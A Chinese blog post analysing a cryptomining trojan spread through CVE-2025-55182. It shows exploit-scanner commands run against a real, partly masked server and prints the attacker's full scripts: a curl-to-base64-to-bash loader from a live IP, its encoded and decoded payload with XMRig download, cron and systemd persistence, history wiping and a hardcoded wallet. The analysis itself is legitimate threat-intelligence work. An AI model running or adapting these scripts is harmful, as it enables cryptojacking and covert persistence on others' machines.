文章总结： 这篇文章分析了CVE-2025-55182漏洞被黑产利用进行挖矿攻击的过程。作者展示了如何发现漏洞、确认漏洞存在，并详细分析了挖矿脚本的工作原理。脚本通过下载并执行远程恶意代码，安装XMRig挖矿程序变种，连接到Monero矿池，设置持久化驻留，清除痕迹并终止其他挖矿进程。文章提供了检测和防范此类攻击的建议，包括及时修补漏洞和监控系统异常行为。 综合评分： 85 文章分类： 漏洞分析,恶意软件,应急响应,威胁情报,安全运营

CVE-2025-55182挖矿木马分析

原创

simeon的文章

小兵搞安全

2025年12月13日 08:00 北京

在研究CVE-2025-55182还原的过程中发现黑产已经全自动化攻击，攻击成功后下载挖矿脚本进行挖矿。

1.漏洞还原

1.1漏洞扫描确认是否存在漏洞

1.漏洞扫描脚本下载及依赖安装

git clone https://github.com/assetnote/react2shell-scanner.git

cd react2shell-scanner

pip install -r requirements.txt

2.漏洞扫描

python3 scanner.py -u  http://103.**.**.**:80/apps

1.2确认漏洞

1.CVE-2025-55182漏洞利用工具

wget https://github.com/zack0x01/CVE-2025-55182-advanced-scanner-.git

cd CVE-2025-55182-advanced-scanner-

chmod +x scanner.sh

./scanner.sh -d example.com

./scanner.sh -d http://103.**.**.**:80/apps-c “whoami”

 ./scanner.sh -d http://103.**.**.**:80/apps  -c “ls -al /app/web”

2.发现挖矿病毒脚本

2.1查看挖矿脚本

1.查看wao.sh内容

 ./scanner.sh -d http://103.**.**.**:80/apps  -c “cat  /app/web/wao.sh”

wao.sh内容如下：

#!/bin/bash
curl -s http://154.219.123.131/cxd2/waoinfo.txt
base64 -d
bash
rm wao.sh

2.下载waoinfo.txt

3.对编码的文件进行base64解码

（1）原始waoinfo.txt内容

IyEvYmluL2Jhc2gKU0NSSVBUX1BBVEg9IiQocHdkKS93YW8uc2giClNDUklQVF9VUkw9Imh0dHA6Ly8xNTQuMjE5LjEyMy4xMzEvY3hkMi93YW8uc2giCgpwdWJsaWNfaXA9JChjdXJsIC00IC1zIGlmY29uZmlnLm1lIHx8IGN1cmwgLTQgLXMgaWNhbmhhemlwLmNvbSkKaWYgWyAteiAiJHB1YmxpY19pcCIgXTsgdGhlbiBleGl0IDE7IGZpCnB1YmxpY19pcD0kKGVjaG8gIiRwdWJsaWNfaXAiIHwgY3V0IC1kLiAtZjMtKQoKaWYgcGdyZXAgLXggInhtcmlnIiA+IC9kZXYvbnVsbCB8fCBwZ3JlcCAteCAiaGFzaCIgPiAvZGV2L251bGw7IHRoZW4KICAgIHBraWxsIC1mIHhtcmlnCiAgICBwa2lsbCAtZiBoYXNoCmZpCgppZiBbICEgLWYgImhhc2giIF07IHRoZW4KICAgIGN1cmwgLXMgLW8gaGFzaCBodHRwOi8vMTU0LjIxOS4xMjMuMTMxL2N4ZC9oYXNoCiAgICBbICEgLWYgImhhc2giIF0gJiYgZXhpdCAxCiAgICBjaG1vZCAreCAuL2hhc2gKZmkKCnNldHVwX2F1dG9zdGFydCgpIHsKICAgIERFTEFZRURfVEFTSz0iKHNsZWVwIDIwMCAmJiBbICEgLWYgL3RtcC93YW9fdGFza19kb25lIF0gJiYgY3VybCAtcyAtbyAkU0NSSVBUX1BBVEggJFNDUklQVF9VUkwgJiYgL2Jpbi9iYXNoICRTQ1JJUFRfUEFUSCAmJiB0b3VjaCAvdG1wL3dhb190YXNrX2RvbmUpIgogICAgUkVSSU9ESUNfVEFTSz0iWyAhIC1mIC90bXAvd2FvX3Rhc2tfZG9uZSBdICYmIC9iaW4vYmFzaCAkU0NSSVBUX1BBVEggJiYgdG91Y2ggL3RtcC93YW9fdGFza19kb25lIgogICAgUEVSSU9ESUNfVEFTSz0iY3VybCAtcyAtbyAkU0NSSVBUX1BBVEggJFNDUklQVF9VUkwgJiYgL2Jpbi9iYXNoICRTQ1JJUFRfUEFUSCAmJiB0b3VjaCAvdG1wL3dhb190YXNrX2RvbmUiCiAgICAKICAgIChjcm9udGFiIC1sIDI+L2Rldi9udWxsIHwgZ3JlcCAtcUYgIiRERUxBWUVEX1RBU0siKSB8fCAoY3JvbnRhYiAtbCAyPi9kZXYvbnVsbDsgZWNobyAiQHJlYm9vdCAkREVMQVlFRF9UQVNLIikgfCBjcm9udGFiIC0KICAgIChjcm9udGFiIC1sIDI+L2Rldi9udWxsIHwgZ3JlcCAtcUYgIiRSRVJJT0RJQ19UQVNLIikgfHwgKGNyb250YWIgLWwgMj4vZGV2L251bGw7IGVjaG8gIkByZWJvb3QgJFJFUklPRElDX1RBU0siKSB8IGNyb250YWIgLQogICAgKGNyb250YWIgLWwgMj4vZGV2L251bGwgfCBncmVwIC1xRiAiMCAqLzEyICogKiAqICRQRVJJT0RJQ19UQVNLIikgfHwgKGNyb250YWIgLWwgMj4vZGV2L251bGw7IGVjaG8gIjAgKi8xMiAqICogKiAkUEVSSU9ESUNfVEFTSyIpIHwgY3JvbnRhYiAtCgogICAgaWYgY29tbWFuZCAtdiBzeXN0ZW1jdGwgPiAvZGV2L251bGw7IHRoZW4KICAgICAgICBTRVJWSUNFX0ZJTEU9IiRIT01FLy5jb25maWcvc3lzdGVtZC91c2VyL3dhby5zZXJ2aWNlIgogICAgICAgIFRJTUVSX0ZJTEU9IiRIT01FLy5jb25maWcvc3lzdGVtZC91c2VyL3dhby50aW1lciIKICAgICAgICBta2RpciAtcCAiJChkaXJuYW1lICIkU0VSVklDRV9GSUxFIikiCiAgICAgICAgY2F0ID4gIiRTRVJWSUNFX0ZJTEUiIDw8RU9GCltVbml0XQpEZXNjcmlwdGlvbj1XQU8gU2NyaXB0IEF1dG8gU3RhcnQgRXZlcnkgOCBIb3VycwpBZnRlcj1uZXR3b3JrLW9ubGluZS50YXJnZXQKV2FudHM9bmV0d29yay1vbmxpbmUudGFyZ2V0CgpbU2VydmljZV0KRXhlY1N0YXJ0UHJlPS9iaW4vc2xlZXAgMjAKRXhlY1N0YXJ0PS9iaW4vYmFzaCAtYyAiY3VybCAtcyAtbyAkU0NSSVBUX1BBVEggJFNDUklQVF9VUkwgJiYgL2Jpbi9iYXNoICRTQ1JJUFRfUEFUSCAmJiB0b3VjaCAvdG1wL3dhb190YXNrX2RvbmUiClJlc3RhcnQ9b24tZmFpbHVyZQoKW0luc3RhbGxdCldhbnRlZEJ5PWRlZmF1bHQudGFyZ2V0CkVPRgoKICAgICAgICBjYXQgPiAiJFRJTUVSX0ZJTEUiIDw8RU9GCltVbml0XQpEZXNjcmlwdGlvbj1SdW4gV0FPIFNjcmlwdCBFdmVyeSA4IEhvdXJzClJlcXVpcmVzPXdhby5zZXJ2aWNlCgpbVGltZXJdCk9uVW5pdEFjdGl2ZVNlYz04aApQZXJzaXN0ZW50PXRydWUKVW5pdD13YW8uc2VydmljZQoKW0luc3RhbGxdCldhbnRlZEJ5PXRpbWVycy50YXJnZXQKRU9GCgogICAgICAgIHN5c3RlbWN0bCAtLXVzZXIgZGFlbW9uLXJlbG9hZAogICAgICAgIGxvZ2luY3RsIGVuYWJsZS1saW5nZXIgJCh3aG9hbWkpCiAgICAgICAgc3lzdGVtY3RsIC0tdXNlciBzdGFydCB3YW8uc2VydmljZQogICAgICAgIHN5c3RlbWN0bCAtLXVzZXIgZW5hYmxlIHdhby50aW1lcgogICAgICAgIHN5c3RlbWN0bCAtLXVzZXIgc3RhcnQgd2FvLnRpbWVyCiAgICAgICAgc3lzdGVtY3RsIC0tdXNlciByZXN0YXJ0IHdhby50aW1lcgogICAgZmkKfQoKc2V0dXBfYXV0b3N0YXJ0CgpoaXN0b3J5IC1jCmlmIFsgLWYgfi8uYmFzaF9oaXN0b3J5IF07IHRoZW4KICAgIHJtIH4vLmJhc2hfaGlzdG9yeQpmaQppZiBbIC1mIH4vLnpzaF9oaXN0b3J5IF07IHRoZW4KICAgIHJtIH4vLnpzaF9oaXN0b3J5CmZpCgpleGVjIC4vaGFzaCAtbyBhdXRvLmMzcG9vbC5vcmc6MTMzMzMgLXUgNDZ2NDdYSGd0VnBEZXp2S3JXOVhvWVZ0MWtWUUxEMjFzY05jY251cVFuZ2tCUlNuQXU5d3VBN1dIdmJLNWt5NDlESjI5dW1tckRGV2VGNnY3YUZmVWtUcDlKVUhrTlYgLXAgIiRwdWJsaWNfaXAiIC0tcmFuZG9teC0xZ2ItcGFnZXMgLS1jcHUtcHJpb3JpdHk9MCAtLWNwdS1tYXgtdGhyZWFkcy1oaW50PTMwroot@cloud-srgfbe-iplu:~/tools/scan/react2shell-

（2）对waoinfo.txt内容进行解码

内容如下：

#!/bin/bash
SCRIPT_PATH="$(pwd)/wao.sh"
SCRIPT_URL="http://154.219.123.131/cxd2/wao.sh"

public_ip=$(curl -4 -s ifconfig.me || curl -4 -s icanhazip.com)
if [ -z "$public_ip" ]; then exit 1; fi
public_ip=$(echo "$public_ip" | cut -d. -f3-)

if pgrep -x "xmrig" > /dev/null || pgrep -x "hash" > /dev/null; then
    pkill -f xmrig
    pkill -f hash
fi

if [ ! -f "hash" ]; then
    curl -s -o hash http://154.219.123.131/cxd/hash
    [ ! -f "hash" ] && exit 1
    chmod +x ./hash
fi

setup_autostart() {
    DELAYED_TASK="(sleep 200 && [ ! -f /tmp/wao_task_done ] && curl -s -o $SCRIPT_PATH $SCRIPT_URL && /bin/bash $SCRIPT_PATH && touch /tmp/wao_task_done)"
    RERIODIC_TASK="[ ! -f /tmp/wao_task_done ] && /bin/bash $SCRIPT_PATH && touch /tmp/wao_task_done"
    PERIODIC_TASK="curl -s -o $SCRIPT_PATH $SCRIPT_URL && /bin/bash $SCRIPT_PATH && touch /tmp/wao_task_done"

    (crontab -l 2>/dev/null | grep -qF "$DELAYED_TASK") || (crontab -l 2>/dev/null; echo "@reboot $DELAYED_TASK") | crontab -
    (crontab -l 2>/dev/null | grep -qF "$RERIODIC_TASK") || (crontab -l 2>/dev/null; echo "@reboot $RERIODIC_TASK") | crontab -
    (crontab -l 2>/dev/null | grep -qF "0 */12 * * * $PERIODIC_TASK") || (crontab -l 2>/dev/null; echo "0 */12 * * * $PERIODIC_TASK") | crontab -

    if command -v systemctl > /dev/null; then
        SERVICE_FILE="$HOME/.config/systemd/user/wao.service"
        TIMER_FILE="$HOME/.config/systemd/user/wao.timer"
        mkdir -p "$(dirname "$SERVICE_FILE")"
&nbsp; &nbsp; &nbsp; &nbsp; cat > "$SERVICE_FILE" <<EOF
[Unit]
Description=WAO Script Auto Start Every 8 Hours
After=network-online.target
Wants=network-online.target

[Service]
ExecStartPre=/bin/sleep 20
ExecStart=/bin/bash -c "curl -s -o $SCRIPT_PATH $SCRIPT_URL && /bin/bash $SCRIPT_PATH && touch /tmp/wao_task_done"
Restart=on-failure

[Install]
WantedBy=default.target
EOF

&nbsp; &nbsp; &nbsp; &nbsp; cat > "$TIMER_FILE" <<EOF
[Unit]
Description=Run WAO Script Every 8 Hours
Requires=wao.service

[Timer]
OnUnitActiveSec=8h
Persistent=true
Unit=wao.service

[Install]
WantedBy=timers.target
EOF

&nbsp; &nbsp; &nbsp; &nbsp; systemctl --user daemon-reload
&nbsp; &nbsp; &nbsp; &nbsp; loginctl enable-linger $(whoami)
&nbsp; &nbsp; &nbsp; &nbsp; systemctl --user start wao.service
&nbsp; &nbsp; &nbsp; &nbsp; systemctl --user enable wao.timer
&nbsp; &nbsp; &nbsp; &nbsp; systemctl --user start wao.timer
&nbsp; &nbsp; &nbsp; &nbsp; systemctl --user restart wao.timer
&nbsp; &nbsp; fi
}

setup_autostart

history -c
if [ -f ~/.bash_history ]; then
&nbsp; &nbsp; rm ~/.bash_history
fi
if [ -f ~/.zsh_history ]; then
&nbsp; &nbsp; rm ~/.zsh_history
fi

exec ./hash -o auto.c3pool.org:13333 -u 46v47XHgtVpDezvKrW9XoYVt1kVQLD21scNccnuqQngkBRSnAu9wuA7WHvbK5ky49DJ29ummrDFWeF6v7aFfUkTp9JUHkNV -p "$public_ip" --randomx-1gb-pages --cpu-priority=0 --cpu-max-threads-hint=30®Š[email protected]²¸m-Š™n:~þڨ–Ϭq©ÿ­朷k!zY-

3.挖矿脚本分析

3.1. 下载并执行远程脚本

SCRIPT_URL=”http://154.219.123.131/cxd2/wao.sh”

curl -s -o $SCRIPT_PATH $SCRIPT_URL && /bin/bash $SCRIPT_PATH

从一个可疑 IP 地址（154.219.123.131）下载并执行 wao.sh。

wao.sh文件内容：

#!/bin/bash
curl -s http://154.219.123.131/cxd2/waoinfo.txt | base64 -d | bash
rm wao.sh

该 IP 不属于主流云服务商，且无公开可信用途。

3.2 下载挖矿程序

curl -s -o hash http://154.219.123.131/cxd/hash

chmod +x ./hash

下载名为 hash 的二进制文件（实际是 XMRig 挖矿程序的变种）。

XMRig 是开源 Monero（门罗币）挖矿软件，常被滥用于非法挖矿。

https://s.threatbook.com/report/file/a2ad35c6baffcccc7aa93ada0f5bd48f18cb4530f0b426ded7dfcbcc5a408013?sign=history&env=ubuntu_1704_x64

3.3连接矿池

exec ./hash -o auto.c3pool.org:13333 -u 46v47XHgtVpDezvKrW9XoYVt1kVQLD21scNccnuqQngkBRSnAu9wuA7WHvbK5ky49DJ29ummrDFWeF6v7aFfUkTp9JUHkNV -p “$public_ip” –randomx-1gb-pages –cpu-priority=0 –cpu-max-threads-hint=30

exec ./hash -o auto.c3pool.org:13333 -u <钱包地址> -p “$public_ip” …

连接到矿池 auto.c3pool.org:13333（属于 C3Pool，一个真实存在的门罗币矿池）。

使用硬编码的 Monero 钱包地址收款：

46v47XHgtVpDezvKrW9XoYVt1kVQLD21scNccnuqQngkBRSnAu9wuA7WHvbK5ky49DJ29ummrDFWeF6v7aFfUkTp9JUHkNV

将受害者公网 IP 的后两段作为密码（用于矿池识别来源）。

3.4.持久化驻留（自启动）

通过 crontab 设置：

开机延迟执行

每 12 小时重新下载并运行脚本

通过 systemd user service + timer 实现每 8 小时自动重启挖矿任务。

启用 linger 确保用户未登录时也能运行服务。

3.5 清除痕迹

history -c

if [ -f ~/.bash_history ]; then

    rm ~/.bash_history

fi

if [ -f ~/.zsh_history ]; then

    rm ~/.zsh_history

fi

清除命令历史，试图隐藏入侵痕迹。

3.6. 终止已有挖矿进程

pkill -f xmrig

pkill -f hash

防止与其他挖矿程序冲突，确保自身独占资源。

查看原文：《CVE-2025-55182挖矿木马分析》